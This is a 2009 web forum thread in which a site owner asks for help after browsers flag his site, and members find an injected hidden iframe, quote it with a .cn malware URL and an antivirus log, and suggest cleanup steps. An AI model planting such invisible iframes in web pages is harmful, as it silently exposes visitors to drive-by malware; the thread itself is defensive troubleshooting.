1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

Please check my web site for virus!

Discussion in 'Security' started by winsoar, Apr 15, 2009.

My computer has just recovered from a trojan attack that was installed through a SWF component masquerading as a routine software update.

Now I've removed the virus from the computer but when I access http://www.microchipcatflaps.co.uk/ (one of my web sites) in Google Chrome I get an error message saying it has detected Malware and refuses to go to the site.

It is saying there is a link to hyperliteautoservices.cn somewhere in the page but when I check the source code I cannot find anything.

Please can you check to see if there is anything on the page that is linking or redirecting to hyperliteautoservices.cn?

Thank you,

James.

winsoar, Apr 15, 2009 IP
  2. diwebdesign uk

diwebdesign uk Peon

Best Answers:
    It loads up fine in my chrome browser however I can see in you code source that it has been hacked and you have a hidden iframe which is linked to another site which is then linked to hyperliteautoservices.cn. You need to get this sorted as people do purchase itmes through your site and their details may get hacked and you could get in trouble.

You could actually think about a re-design of you site as it is crammed full of text and content and looks a bit outdated.
    If you want any more help, please don't hesitate to ask.

diwebdesign uk, Apr 15, 2009 IP
  3. winsoar

winsoar Well-Known Member

Best Answers:
    Where is the iframe in the source code? I've checked and cannot find any such code.

The site is certainly not outdated. We get complimented on the web site every day.

Also I've reinstalled the Google Chrome browser and the message has stopped appearing so I think the problem was with the browser being modified rather than the web site.

Can anyone else check please to be sure?

winsoar, Apr 15, 2009 IP
  4. awatson

awatson Active Member

Best Answers:
    I'm seeing the iframe, so it's not (just) a browser problem. The iframe is on line 5 of your source, right after the opening body tag. Presumably they got access to your site files somehow. I'd change all passwords, and make sure your local computer is totally clean. Perhaps even a wipe and reinstall - if they had access it's hard to know what all they may have done to your system.

awatson, Apr 15, 2009 IP
  5. emed

emed Peon

Best Answers:
    Detected by NOD32:
    15/04/2009 04:19:09 p.m.	HTTP filter	file	http://liteautogreatest.cn/index.php	JS/Exploit.Agent.AFH trojan	connection terminated - quarantined	Threat was detected upon access to web by the application: C:\Archivos de programa\Mozilla Firefox\firefox.exe.
    Code (markup):
    delete this from your source, its right after the body tag as awatson said
    <iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>
    Code (markup):

emed, Apr 15, 2009 IP
  6. onehundredandtwo

onehundredandtwo Guest

Best Answers:
    You should temporarily take down your site and fix the problem before putting it back up again, you don't want your visitors getting viruses or your site will get a pretty bad impression.

It would also help if you put a space between the http:// and the rest of your site so the link is not active, so other members of this forum don't get a virus as well.

Best of luck with your problem,
    onehundredandtwo.

EDIT: Afterwards I would make sure any PHP or ASP(X) scripts are up-to-date so that you can't be hacked again.

onehundredandtwo, Apr 15, 2009 IP
  7. designgenerator

designgenerator Guest

Best Answers:
    also make sure to inform your hosting company about hacker attacks as this could be a case for several people.

designgenerator, Apr 15, 2009 IP
  8. winsoar

Best Answers:
    Thanks for your help please can you check it is removed now?

winsoar, Apr 16, 2009 IP
  9. T.Guru

T.Guru Peon

Best Answers:
    The site seems to still be up and going. Try removing it again.

T.Guru, Apr 16, 2009 IP
  10. CDZ

CDZ Peon

Best Answers:
    i have checked your website. The site still seems to be going. Can you remove it again so that i can check your site again?

CDZ, Apr 16, 2009 IP
  11. diwebdesign uk

diwebdesign uk Peon

Best Answers:
    Can't see the iframe any more, seems to be fine now.
    Would change all passwords and everything like that regularly for extra security.

I noticed your forum is not up and it links though to your facebook instead. If you do go back to using a forum like PhpBB, that you were using, make sure you keep up to date with updates and patches etc.

Hope the business goes well.

diwebdesign uk, Apr 16, 2009 IP
  12. winsoar

Best Answers:
    Thank you very much for all your help. I'm pleased we got this fixed ASAP.

winsoar, Apr 16, 2009 IP
  13. c4gamerz

c4gamerz Well-Known Member

Best Answers:
    Nope you may still have malware on other pages just goto google webmaster central and add/verify your site than you will see message about how many pages are infected so just fix those page and click on something like submit for review like that! Google will verify your site again and will take your site out from black list if it appears to be clean ;)

c4gamerz, Apr 16, 2009 IP
  14. winsoar

Best Answers:
    Will check that too c4. Thanks for the tip!

winsoar, Apr 16, 2009 IP
  15. rliddle

rliddle Peon

Best Answers:
    Happened to me a few times. (I run 60 plus sites) so we created the site in my signature. We will help you isolate the problem, and make it so you will be notified via email if there is a hack. Being hacked is the worst. There are some very clever hacks, such as using ASCII code to redirect. ugggghhh.

rliddle, Apr 20, 2009 IP
  16. c4gamerz

Best Answers:
    My pleasure!

c4gamerz, Apr 21, 2009 IP
  17. uranus

uranus Peon

Best Answers:
    This just happened to my site yesterday, any help will be appreciated. www mdtcs.com, google displays that this site could be harmfull to your computer.

uranus, Apr 22, 2009 IP
  18. c4gamerz

Best Answers:
    follow these guidelines and everything would be okay! If you want than i can help you for a little fee!

Thanks

c4gamerz, Apr 22, 2009 IP
  19. jackio

jackio Banned

Best Answers:
    Scan your computer, contact your hosting provider for possible server compromise and change your passwords.

jackio, Apr 24, 2009 IP
  20. traffic97

traffic97 Well-Known Member

Best Answers:
    Hackers get in to your sire via your FTP software profile. Hence , Do not save your site password in your FTP software like cuteftp,flashfxp, etc... Always type FTP password manually on each connect.

Hope this message , helps all....

traffic97, Nov 11, 2009 IP